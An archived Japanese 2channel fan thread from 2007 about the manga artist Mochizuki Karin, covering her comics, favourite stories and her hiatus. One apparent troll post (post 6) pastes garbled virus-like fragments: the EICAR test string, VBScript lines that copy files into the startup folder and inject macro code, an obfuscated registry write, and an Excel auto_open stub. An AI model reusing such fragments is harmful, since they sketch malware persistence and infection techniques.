5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●ノドアメイカガ 望月花梨8●

1 :花と名無しさん:2007/09/20(木) 23:40:16 ID:???0
新作への希望も込めて少女漫画板!!
花とゆめ漫画家の望月花梨を語るスレッドです。
携帯利用者の為に[1]は短く!
前スレ・過去ログは>>2にあります。

2 :花と名無しさん:2007/09/20(木) 23:41:59 ID:???0
              ∩
             | |
             | |
             | |
             | |
       ∧_∧  | |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      ( ´Д`)//  <  先生、あたし望月花梨のこと好きでいてもいいですか?
      /     /    \___________
     / /|    /
  __| | .|    | __
  \   ̄ ̄ ̄ ̄ ̄   \
  ||\            \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||
前スレ
●ノドアメイカガ 望月花梨7●
http://anime2.2ch.net/test/read.cgi/gcomic/1144033731/
●ノドアメイカガ 望月花梨6●
http://comic6.2ch.net/test/read.cgi/rcomic/1104983665/
●ノドアメイカガ 望月花梨5●
http://comic6.2ch.net/test/read.cgi/gcomic/1067334619/
●ノドアメイカガ 望月花梨4●
http://comic.2ch.net/test/read.cgi/gcomic/1043521586/
●ウフッフ 望月花梨3●
http://comic.2ch.net/test/read.cgi/gcomic/997632742/
★望月花梨ってどお?★2
http://comic.2ch.net/gcomic/kako/997/997632742.html
☆望月花梨ってどお?☆
http://salad.2ch.net/gcomic/kako/977/977136307.html

3 :花と名無しさん:2007/09/20(木) 23:43:23 ID:???0
■■現在発売中のコミックス■■
 コナコナチョウチョウ
 欲望バス/Wの庭園(ウォーターガーデン)
 純粋培養閲覧図
 裸足めぐり
 チョコレート ダイアリィ
 笑えない理由(全4巻)
 スイッチ(全2巻)
 緑の黒髪
 鍵 ーかぎー

■■文庫版コミックス■■
 欲望バス 

■■ここ最近の発表作(コミックス未収録)■■
 【2005】
 通い婚(花とゆめ特別編集3月15日 花とゆめプラス+)
 丘をこえて(花とゆめ10月25日増刊号 花とゆめプラス+)

4 :花と名無しさん:2007/09/20(木) 23:49:10 ID:???0
乙です

5 :花と名無しさん:2007/09/21(金) 00:11:22 ID:???0
1乙

モチカリ、別に無理して新作描かなくていいから幸せでいてくれ

6 :花と名無しさん:2007/09/21(金) 00:21:20 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/09/21(金) 06:07:20 ID:???O
ウエンツがTVに出る度、モチカリを思い出す…
モチカリ、ウエンツがこんなに有名になると思わなかっただろうな…

8 :花と名無しさん:2007/09/21(金) 18:52:25 ID:0+Ln9EYi0
┏━━━━━━━━━━━━━━━━━━
┃ 【望月花梨研究会規則】
┃守れない人は、研会員失格です
┃・荒らしは放置すること、荒らしに反応するのは荒らしと同じです
┃・理由無きスレッド乱立、マルチポストは迷惑なのでやめましょう
┃・スレッドはみんなのもの、一人で占有せず仲良く使いましょう
┃・笹森花梨の話は葉鍵かギャルゲー板で


┗━━━   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ━━
    _ < みんなきまりを守るんよ      _  
   '´,   ヽ \_________     . ´ , `ヽ
<^(゚w゚)ノハヾ^、                  .ノ .八从リリ
´Wリ(i!゚ ヮ゚ノv'`   ̄ ̄ ̄ ̄ ̄ ̄ ̄\     `ヽ!. ゚ー゚ノ
   ⊂)卵iつ   笹森さんにしては  \     ハ` :'ヽ
    く/_|〉    まともなことを……  >  (_'i. ⊥.i)
     し'ノ    ________/     |___|__|


9 :花と名無しさん:2007/09/22(土) 18:01:23 ID:???0
即死防止

10 :花と名無しさん:2007/09/23(日) 22:01:50 ID:XHMNbX0dO
乙です〜

11 :花と名無しさん:2007/09/26(水) 14:42:49 ID:???O
捕手

12 :花と名無しさん:2007/09/28(金) 11:24:42 ID:???0


13 :花と名無しさん:2007/09/28(金) 17:23:27 ID:EIM0MScJ0
期待あげ

14 :花と名無しさん:2007/10/03(水) 13:22:46 ID:???O
モチカリ…鍵の続き読みたい

15 :花と名無しさん:2007/10/03(水) 23:11:31 ID:???0
なんでもいいからモチカリの新作ストーリー漫画読みたい。

16 :花と名無しさん:2007/10/05(金) 08:16:47 ID:FMIYN1V2O
>>7
ウエンツは笑えない理由の存在知ってるかな?
モチカリの作品読んでほしー。
事務所に送ってみようかな

17 :花と名無しさん:2007/10/05(金) 12:06:51 ID:???0
ウエンツにモチカリを読ませる→
上手い事ウエンツがモチカリにハマる→
メディアでオススメ本紹介する際にモチカリを挙げる→
ウエンツファンがモチカリ読む→
見事大勢のファンが生まれる→
ファン大勢がモチカリ復活エールを送る→
モチカリ復活・・・グフッ

18 :花と名無しさん:2007/10/05(金) 19:56:52 ID:???0
正直ウエンツが好きそうな作風では…


イヤ知らんけど

19 :花と名無しさん:2007/10/05(金) 23:20:50 ID:???O
厨なきもするけど

20 :花と名無しさん:2007/10/05(金) 23:48:48 ID:???O
>>19
どこが?

21 :花と名無しさん:2007/10/06(土) 00:52:05 ID:???0
>>20
ウェンツにモチカリ作品を送り付ける行為そのものが

22 :花と名無しさん:2007/10/06(土) 01:01:37 ID:???0
16ってマジだったのかw ネタだと思ってたw
マジならやるなよ、恥ずかしい。

23 :花と名無しさん:2007/10/06(土) 12:32:08 ID:???0
ノリにマジレス恥ずかしい

24 :花と名無しさん:2007/10/06(土) 19:35:08 ID:fyUb1dr1O
16のレスに良いかもとマジに思った自分は厨

25 :花と名無しさん:2007/10/07(日) 00:30:07 ID:???0
このままフェードアウトしていくのかなぁ。。
モチカリ〜〜〜〜

26 :花と名無しさん:2007/10/08(月) 22:44:20 ID:???0
モチカリ…。
新作読めないのは寂しいなあ…。

そういえばコミクス緑の黒髪だけ買い損ねて持ってない。
これは短編集?

27 :花と名無しさん:2007/10/09(火) 01:03:59 ID:???0
>>26
中編っていうのかな?
3回完結の連載が二つ(緑の黒髪とシャボン)入ってる

28 :花と名無しさん:2007/10/09(火) 01:07:09 ID:???0
緑の黒髪ならまだ絶版じゃないし、手に入るのでは?

29 :花と名無しさん:2007/10/09(火) 19:02:22 ID:???0
緑の黒髪おすすめだよ、ウケ易さもあると思うし

ここでもよく言われてるけど、
モチカリは3話完結の短期連載が性に合ってるというのか、
良い具合にセンスがにじみ出てて面白い

30 :花と名無しさん:2007/10/10(水) 15:23:44 ID:3y3JhqMvO
初期作品とか、あんまりモチカリ色の強い話ってちょっと苦手です。
笑えない理由以降の作品の方が自分は好きだな。笑えない理由、スイッチ、鍵とか。
でもここは初期作品の方が人気あるんだよね…

31 :花と名無しさん:2007/10/10(水) 17:12:06 ID:???0
モチカリ作品が好きなら差し支え無いさ!
それぞれ趣向は違うんだし。
自分もモチカリの初期作品はアクが強くて苦手だった。
でも何度も読み返す内に、というか年をとるにつれて
共感出来る部分やはっとする部分が出てきたかな

32 :花と名無しさん:2007/10/11(木) 02:56:00 ID:jK0JOFV8O
>>30
どっちかって言ったら私もチョコレートダイアリーとか笑えない理由以降の話の方が好きかな。
スイッチとか一見すごくシンプルだけど話が綿密で深いし、モチカリ作品だったら一番好きかも。
初期作品は確かに年取ってから余計に良さわかるね!

33 :花と名無しさん:2007/10/13(土) 04:31:19 ID:???0
元担当と結婚したって聞いたけど、
新生活が落ち着いたら新作描いて欲しいよ。

34 :花と名無しさん:2007/10/13(土) 06:36:37 ID:???0
>>33
ソースは?

35 :26:2007/10/14(日) 10:14:11 ID:???0
返事遅くなりました。
レスくれた人ありがとう。
探してみたけど、近所の本屋にはなかったorz
今度大きな本屋行ったときに見てみます。

私は1番好きなのはスイッチかな。
同じモチカリ好きでも作品の好みは人それぞれで面白いね。

36 :花と名無しさん:2007/10/14(日) 14:11:56 ID:???0
前スレから結婚したとか書いてる人いたけど、関係者?
ソース出せないならやめなよ。
そもそもそれがほんとでも本人が公表してないなら
2chなんかに書き込まないほうがいいだろ。

37 :花と名無しさん:2007/10/14(日) 17:25:31 ID:???O
今日ブクオフで笑えない理由買って来た。
読み終わったのはいいんだが、2巻の中身が1ページごとにオレンジのクーピー(多分)で丁寧に薄く塗り潰されていてびっくりした。
余りにもきっちり塗り潰されてるから、こーいう紙質で印刷発行されたのかと調べてみたが、他の巻は普通だった。

何考えてこんな事したんだろう・・・・

38 :花と名無しさん:2007/10/14(日) 20:38:28 ID:???0
>>37
オレンジのクーピーで塗り潰されてる・・・
不気味というか、一体どういう理由なんだろ・・・
ちょっと見て見たい気もするw

39 :花と名無しさん:2007/10/15(月) 17:47:39 ID:???0
本屋さんで探してもなかったので、
「裸足めぐり」とあといくつか注文して
あとで控えを見てみたら作品タイトルのところに
「裸めぐり」って書かれてた・・・
変態じゃねーか

40 :花と名無しさん:2007/10/15(月) 21:05:39 ID:???0
秋の日差し浴びてると「トゲ」を思い出す
モチカリ作品は日常のちょっとした事物からふと思い出すことが多いな

41 :花と名無しさん:2007/10/15(月) 21:44:01 ID:???O
>>39
お茶吹き出したwww



42 :花と名無しさん:2007/10/16(火) 04:39:58 ID:???0
漫画と全く関係ないのですが…
昨日NHKのBSで放送していた(多分)タイ映画の主人公と幼馴染の
女の子がモチカリ漫画から抜け出したかのような子たちでした!
黒目が大きくてまつげ長くて、長くてまっすぐな脚で、二人の演技も
妙に色っぽくて、リアル白と黄色な感じ(やや南国風味ですが)。

話もモチカリ漫画の寄せ集め+ベタでも良質な少女漫画+ドラえもん
が居ないドラえもん(昭和を懐かしむ漫画)って感じで良かった。
夕焼けや日没後や黄色い月や緑生い茂る日中など風景も印象的でした

43 :花と名無しさん:2007/10/16(火) 14:43:28 ID:???O
>>40
わかる。モチカリの作品は季節感もあるし、何気ない日常生活で
ふと思い出すんだよね。
日常のそういう一時ですぐ忘れてしまうような所を漫画に
詰め込んであるから、あらためて感性豊かだと思うよ。

44 :花と名無しさん:2007/10/16(火) 20:00:14 ID:???0
>>40 >>43

モチカリ漫画だと夏のイメージが強いな。
純粋培養閲覧図の冒頭の線路の場面とか。
ジージーセミが鳴いてて、日差しが強い感じ
実際、季節が夏の作品多くない?


思いつく夏っぽい作品

夏はまだこれからだし
Wの庭園
純粋培養閲覧図
クロルカルキ
緑のこども
夜 夜中
夜 夜中

あと、スイッチ(逃げ水のエピソードが印象強い)

45 :花と名無しさん:2007/10/16(火) 20:40:56 ID:???0
台風ポピーの季節になりましたね

46 :花と名無しさん:2007/10/17(水) 01:22:47 ID:???0
もう終わっちゃったけど、私は彼岸花見るとモチカリ思い出すな
作中には出てきてないのに

47 :花と名無しさん:2007/10/22(月) 16:21:48 ID:???O
モチカリ何してるんだろう…


48 :花と名無しさん:2007/10/24(水) 01:28:18 ID:???O
学園アリスのファンブックに、
望月花梨先生が1頁、原稿描いているのを知って
それだけで買いました。
凄い素敵なイラストでした。

49 :花と名無しさん:2007/10/25(木) 16:10:29 ID:???0
なつかしい。ここにうpしたなぁ。

50 :花と名無しさん:2007/10/27(土) 22:03:39 ID:???0
>>44
あと「犬と夏服」も

51 :花と名無しさん:2007/10/27(土) 22:05:09 ID:???0
ペテン・エンジェルもよろしく!

52 :花と名無しさん:2007/10/27(土) 23:17:57 ID:???0
新刊まだぁ

53 :花と名無しさん:2007/10/29(月) 14:45:23 ID:???0
犬と夏服のその後が読みたい
アレで終わるからこそイイのかもしれないけど

54 :花と名無しさん:2007/10/29(月) 18:54:57 ID:???O
笑えない理由を、古本屋じゃなく新しいのが欲しいな
そういうのってお店に頼めば発注とかしてお取り寄せ出来るのかね

55 :花と名無しさん:2007/10/29(月) 19:14:48 ID:???0
うん
向こうから在庫が無いって言われたらおわりだけど・・・
後はAmazon使うとか。

56 :花と名無しさん:2007/10/30(火) 00:42:54 ID:???O
>>55
ありがとー
一応Amazon見てきたら、在庫無しだった様子
本屋さんに行ってみるよ

57 :花と名無しさん:2007/10/30(火) 00:54:43 ID:???0
>>56
http://www.s-book.com

↑ここになかったら出版社にも在庫なしだから、
たぶん取り寄せとかもできないんじゃないかな。
あとは店頭在庫を地道に探すのみかと。

ざっと見たら、紀伊国屋の札幌ロフト店に3,4巻アリってなってたけど、どうなんだろ?
三省堂は今の時間検索できないからわかんなかった。

58 :花と名無しさん:2007/10/31(水) 07:11:02 ID:???O
鍵以降新刊が出てない期間は5年ぐらい?
あと1冊ぐらいは出してほしいなあ…
コナコナ〜とか泥沼の〜とか初期を彷彿とさせるこの人にしか描けない切ない話がそろそろ読みたいよ(´・ω・`)

59 :花と名無しさん:2007/11/01(木) 15:28:40 ID:???0
コナコナチョウチョウの終わりのカットすげー好き

60 :花と名無しさん:2007/11/02(金) 00:18:34 ID:???O
>>57
ご丁寧にありがとう!


あー、新作読みたいなぁ
モチカリの絵、今はどんな感じなんだろ

61 :花と名無しさん:2007/11/02(金) 03:10:16 ID:???O
去年は年賀状出したら暑中見舞いハガキが届いて、
女の子と金魚のイラストを見れたけど、
今年は年賀状書いたのに何も届かず…
現在の絵柄は不明。あんまり変わってないと良いな〜。
最近、ヒグッチの手伝いもしてないっぽいよね?
もう漫画描く気なさそうだよね…

62 :花と名無しさん:2007/11/02(金) 23:44:58 ID:???O
何てもったいないんだろう…

昨日秒速5センチメートル見たらモチカリ思い出して全部単行本読み返した。

モチカリみたいな人が漫画会から消えてしまうのが本当に悲しく思ったよ

63 :花と名無しさん:2007/11/03(土) 01:39:47 ID:???O
これから先描かないのなら、ちゃんと引退発表
してくれないかな。とりあえず
しばらくは描きません、でもいいからさ。
もう引退したのか?それともいつかまた描くのか?と
待ってるのはつらいよー。
義務ではないけど、ファンとしては近況が知りたい。
漫画界って引退発表とかないもんなのかな?

64 :花と名無しさん:2007/11/03(土) 17:22:37 ID:???O
>>61
うらやま!
私は好きすぎると手紙とか出せない…
引退表現があったら最後に出してみようかなとは思う
もちろん引退とか嫌だけど!!

65 :花と名無しさん:2007/11/06(火) 17:10:37 ID:???0
誘導

66 :花と名無しさん:2007/11/07(水) 12:05:55 ID:???0
>>46
純粋培養閲覧図の柱の@に彼岸花らしきものが描いてありましたよ。
カルスの花園に出したかったけど出しそびれたんだってさ。

67 :花と名無しさん:2007/11/08(木) 05:25:53 ID:???0
>>63
>漫画界って引退発表とかないもんなのかな?

よくは知らないけど、ある程度有名な少女漫画家のうちで
ハッキリと引退表明している人は、

・岡田あ〜みん (ギャグ漫画家として神格化しているが、もうギャグを描きたくないとの発言あるらしい)
・紡木たく (もう描ききったと明言したそうだ)
・内田善美 (←復刊本すら拒否している)

ぐらいじゃないかなぁ?あとはなし崩し的に、いつの間にかフェードアウトな
漫画家さんが大多数っぽい。
昔はある程度実績のある作家でも、現在のようにネットで直接ファン同士が
情報連絡する事がなかったので、個々に編集部に手紙や電話で
問い合わせて教えてもらうことが出来るかどうか…って感じじゃないかと。



68 :花と名無しさん:2007/11/10(土) 07:19:11 ID:???O
望月さん…好きです(*´`*)

69 :花と名無しさん:2007/11/13(火) 00:46:57 ID:???O
ガチで白泉に電話で問い合わせてみようかな…
その場合って持ち込みの予約用とかに表示されてる番号に掛ければいいかな?

あと何て言おう…
「望月さんの大ファンで新作を心待ちにしているのですが、今後活動予定は無いのでしょうか?」
って聞いたら何か教えてくれるのかな?

70 :花と名無しさん:2007/11/13(火) 01:04:07 ID:???0
>>69
携帯さんなので、あえて抜粋コピペ
(なお、2chの元々の仕様で、電話番号が文字化けしたらすまん)
たぶん、ここが一番最適かと思われる。

白泉社公式サイト・お問合せページ
ttp://www.hakusensha.co.jp/inquiry/aboutmag.html
雑誌・書籍や作品に関するご意見、ご感想、ご質問等は、
各雑誌・書籍の編集部へ直接お電話にてご連絡ください。
以下が各編集部への連絡先となります。

花とゆめ編集部⇒03-3526-8025
別冊花とゆめ編集部⇒03-3526-8030

71 :花と名無しさん:2007/11/13(火) 07:11:57 ID:???O
>>69
皆の期待を一身に背負って…頑張れ!!!

72 :花と名無しさん:2007/11/13(火) 20:31:50 ID:???O
>>69です。
モチカリ現役時代って花夢か別冊どっちに良く載ってましたか?

あと>>70さんご親切にありがとう。
明日どっちかに電話してみます…!

73 :花と名無しさん:2007/11/13(火) 20:46:21 ID:???0
>>72
いちおう花ゆめでええんでないかしら
オクラホマミキサーの話(タイトル忘れた)が載った辺りは
確か別冊だった気がするけど。

丁度その時、花ゆめ本誌の別冊宣伝ページで
ホマの赤いジャージ姿のカットが載ってたけど、
とても印象的だったよ。

モチカリコミックス表紙のイラスト(裸足めぐりやチョコアリとか)
が、購入のきっかけでもあったな。自分は

74 :花と名無しさん:2007/11/13(火) 20:50:52 ID:???0
モチカリにファンレター出すのも得策だと思うよ。
あとは花ゆめや別花のアンケに「望月花梨さんの新作が読みたいです!」と
熱意を伝えたり。

75 :花と名無しさん:2007/11/14(水) 12:08:34 ID:???O
重複が上にあるのでageるよ。

76 :花と名無しさん:2007/11/14(水) 12:12:25 ID:???O
>>37キモッ!オレンジクーピーうpしてw

77 :花と名無しさん:2007/11/15(木) 14:31:08 ID:???0
前にも編集に電話したって人いたよね?
描いて欲しいけど、本人にその気がないとか言われたんじゃなかったっけ。

78 :花と名無しさん:2007/11/15(木) 16:42:35 ID:???O
久々に全巻流し読みした。

カルスの花園
犬と夏服
クロルカルキ
Junk


が好きすぎる。これだけは何回も読み返してしまう。
新作読みたいよー!モチカリー!
>>69さん期待してます。

79 :花と名無しさん:2007/11/18(日) 03:14:36 ID:???0
で、音沙汰なしか・・・・

80 :花と名無しさん:2007/11/19(月) 10:32:25 ID:???0
笑えない理由は2巻までが面白い

81 :花と名無しさん:2007/11/19(月) 19:35:02 ID:???O
初雪降ったよ
スミレグラスの季節だなー
スミレちゃんはモチカリヒロインの中でもかなり好みだw

82 :花と名無しさん:2007/11/19(月) 19:41:34 ID:???0
モチカリヒロインはツンツンが多いよな

83 :花と名無しさん:2007/11/19(月) 20:25:02 ID:???0
基本的に素直じゃない子が多いしね

素直じゃないひねくれた小中学生を描かせたら
右に出るものはいないと今でも思ってるよ

84 :花と名無しさん:2007/11/19(月) 22:34:20 ID:???O
モチカリ作品は短編映画にしてくれたらキレイなの出来そうだな
信者意見スマソ

85 :花と名無しさん:2007/11/19(月) 22:47:14 ID:???0
モチカリ自身が短編映画の影響受けてそうだもんね

86 :花と名無しさん:2007/11/20(火) 00:07:11 ID:???0
ひょっとして結婚、出産でもして一休み中で、
落ち着いたらまた出てきてくれるのでは、と期待している…

ほんと、モチカリは自分のハイティーンの青春。

87 :花と名無しさん:2007/11/20(火) 01:29:45 ID:???0
自分はローティーンだなぁ
リア中時代に読んで、今考えると痛いくらいどっぷりはまってた
あの時に読んでよかったと思ってるよ

88 :花と名無しさん:2007/11/20(火) 08:54:49 ID:???O
私はローティーンから今のハイティーンまで、ずっと好きだ。

89 :花と名無しさん:2007/11/20(火) 13:21:36 ID:???0
初めて買ったのは笑えない理由で、表紙買いだったんだけど
読み始めてこれはシリアスなのかコメディなのか悩んだw

90 :花と名無しさん:2007/11/20(火) 18:10:39 ID:???0
確かにテイストにちょっとギャグが入ってるよね
モチカリなりに明るく描いてるんだと思うけどw

91 :花と名無しさん:2007/11/20(火) 20:33:33 ID:???0
今朝の遺伝子話の見出し「緑の黒髪」でモチカリ作品の方を思い浮かべたw

92 :花と名無しさん:2007/11/23(金) 15:46:14 ID:z1T336PN0
最近ちらっと見たアニメでエウレカセブンってのがあったんだけど、その話に出てくるアネモネって
女の子がすごいモチカリテイストな子だった。わかままで自分勝手で、でも不安定ではかなげで。
ちょと谷崎潤一郎の小説のヒロインみたいな感じもあって。ナオミみたいな。
誰か知ってる人いない?

93 :花と名無しさん:2007/11/23(金) 23:27:15 ID:???O
知ってるけどそうは思わんかったな
忘れてるだけで、また観たら何か感じるものがあるかもしれないけれど

94 :花と名無しさん:2007/11/24(土) 00:06:41 ID:???0
今更エウレカねえ…

95 :花と名無しさん:2007/11/25(日) 16:51:20 ID:???O
冬になると「緑の黒髪」を思い出しては読み返す。

もうモチカリの新作は望めないのかなあ。もっとこの人の作品が読みたかった…

96 :花と名無しさん:2007/11/28(水) 01:58:04 ID:???O
ブックオフでスイッチを見つけたので望月さんの漫画初めて買ってみました。題名とシンプルなんだけど独特な雰囲気の表紙に惹かれて。
当たりでした!すごく面白かったです。
物語がシンプルで淡々と静かに話が進んでて、でも奥が深くて。
他の教師生徒の恋愛漫画はいろいろ読みましたが、個人的に一番面白いと思いました。
他の漫画みたいに直接的な描写や言葉は少ないけど、登場人物の心理描写がとても細かく書いてあって構成もしっかりしているので読み応えがありました。
友達に薦めたらなんか物足りない!と言われましたが…
確かに他の教師生徒ものと比べて物足りない感じがするのはわかりますが、余計なものを全て削ぎ落として簡潔に物語をまとめてあるのはさすがだと思います。物語の中にある余韻も見事ですね。
まさに私が求めていたのはコレ!と言う感じです。
望月さんの作品をこれから集めてみようと思います。
つい興奮してしまい長々と自分語りすみませんでした。

97 :花と名無しさん:2007/11/28(水) 04:03:03 ID:???O
スイッチのケイちゃんは
清楚なのになんだかエロいという
不思議なキャラ
ラスト物足りなくて、
もっと読みたいと思ったけど
あれだから良かった気がする。
二人のその後を色々想像できるというか…


98 :花と名無しさん:2007/11/28(水) 11:28:03 ID:4tFYkCoRO
>>96
いらっしゃい。
モチカリファンが増えるのは嬉しいね
スイッチは自分もモチカリ作品の中で結構上位だな。
ヒロタがかっこよすぎ。
他にも素敵な作品たくさんあるから読んでみてね

99 :花と名無しさん:2007/11/28(水) 18:16:47 ID:???O
私はピュアホワイトが一番好きです。一昔前の外国映画を観ているような気分になる。
純粋培養は何となくエヴァの影響が見られるけど、モチカリ的に感銘を受けた作品だったのかな?

100 :花と名無しさん:2007/11/28(水) 19:35:39 ID:???0
スイッチのケイちゃん大好きだ。
あの性格も見た目も最高。

101 :花と名無しさん:2007/11/29(木) 00:47:59 ID:???O
99>
ピュアホワイト私も好きです。
エヴァ詳しくないんですが、純粋培養の、どの辺りが影響を受けてそうなんですか?

102 :花と名無しさん:2007/11/30(金) 00:44:26 ID:???O
>>100
おなじくノシ

スイッチはケイの友達(同級生)視点で読んでた。
広田とケイの具体的な付き合い方が殆ど描かれてなかった分、余計に不埒な妄想を駆り立てられたなァ。

103 :花と名無しさん:2007/12/01(土) 13:33:11 ID:???O
スイッチは2巻の頭にある梢目線で語られる回が好きだな
水というキーワードが効いていて話がとても良くまとまってる
短編で光る人だからか、連載作の一話を切り取って見ても質の良いものが多いよね

104 :花と名無しさん:2007/12/02(日) 20:32:33 ID:8UddV3H5O
初めてこの人の漫画読んだのは笑えない理由で小学生のときだったんだけど、笑えない理由は普通に面白いのにコミックスの短編の話がやけに怖くてゾッとしたのを覚えてる。
ジャンクとか傷あととか。
望月の作風がわかってからは暗い話も読めるけど最初はビビった。ジャンク好きだなぁ。なんだか切なくなる

105 :花と名無しさん:2007/12/02(日) 20:44:48 ID:???0
ジャンク読んだあとは無性に輸入菓子が食いたくなるw

「笑えない理由」や「スイッチ」もいいけど、
個人的には甘い毒のような作風こそモチカリ作品だと思ってる。
だからこそ鍵で「犬と夏服」読んだ時は嬉しかったな。
初期の作風ktkr!とおもったよ

106 :花と名無しさん:2007/12/03(月) 00:07:09 ID:???0
>>104
わかるわかる
傷あとの黒さに驚いた


107 :花と名無しさん:2007/12/03(月) 00:22:05 ID:???O
泥沼の子供たち

の暗さが個人的に好きだ

108 :花と名無しさん:2007/12/03(月) 17:04:16 ID:???O
スイッチ人気あるんだね。
教師と生徒の恋愛漫画っていう括りだったら一番好き。
このような設定の漫画って大抵似たような展開だったり、話を大袈裟にしてれば良いって感じでつまんないのばっかりだったけど、スイッチは違ったなぁ。
教師と生徒としての立場をちゃんと考えてるし、前にも出てたけど直接的な描写がなくても魅せることってできるんだって初めて思わされた作品。
まぁくらもちふさこも好きだけど

109 :花と名無しさん:2007/12/03(月) 17:29:04 ID:???O
モチカリは初期の頃とか、ありきたりの話を書かないからこそ個性的で面白かったけど、
ありきたりの設定でもモチカリの手にかかればすごい新鮮な話に見えるんだなと思ったのがスイッチ。
初期のようなちょっと毒っぽいのも好きだけど、個人的に後半の少し毒が抜けた感じの雰囲気の方が好きだからまた書いて欲しい。
そういえば鍵以降に短編2本書いてるんだよね。
通い婚読んだことある人いる?題名からしてすっごい気になるんだけど

110 :花と名無しさん:2007/12/03(月) 22:26:04 ID:???0
通い婚は4ページしかないから…
うろおぼえだけど猫が出てきてたような

丘を越えて もそんなにページ数無かったから
モチカリのためだけに雑誌を買う気分にはならなかったわ
モチカリらしからぬサワヤカな話だったし

111 :花と名無しさん:2007/12/03(月) 23:18:41 ID:???0
通い婚・・・確かカーテンを閉める女子で話をしめてたような

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)